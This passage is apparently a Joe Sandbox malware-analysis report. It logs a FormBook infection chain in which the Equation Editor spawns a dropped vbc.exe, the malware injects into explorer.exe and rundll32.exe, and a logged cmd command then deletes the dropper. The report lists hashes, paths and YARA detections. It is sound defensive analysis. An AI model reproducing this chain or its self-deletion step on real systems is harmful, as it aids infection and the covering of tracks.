                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: vbc.exe PID: 1700 Parent PID: 3024

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:04
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: vbc.exe PID: 1780 Parent PID: 1700

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:25
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x270000
                                                                                                                                                  File size:713216 bytes
                                                                                                                                                  MD5 hash:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: explorer.exe PID: 1388 Parent PID: 1780

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:27
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: rundll32.exe PID: 1688 Parent PID: 1780

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:53
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:44544 bytes
                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: cmd.exe PID: 1544 Parent PID: 1688

                                                                                                                                                  General

                                                                                                                                                  Start time:17:15:54
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4ab10000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >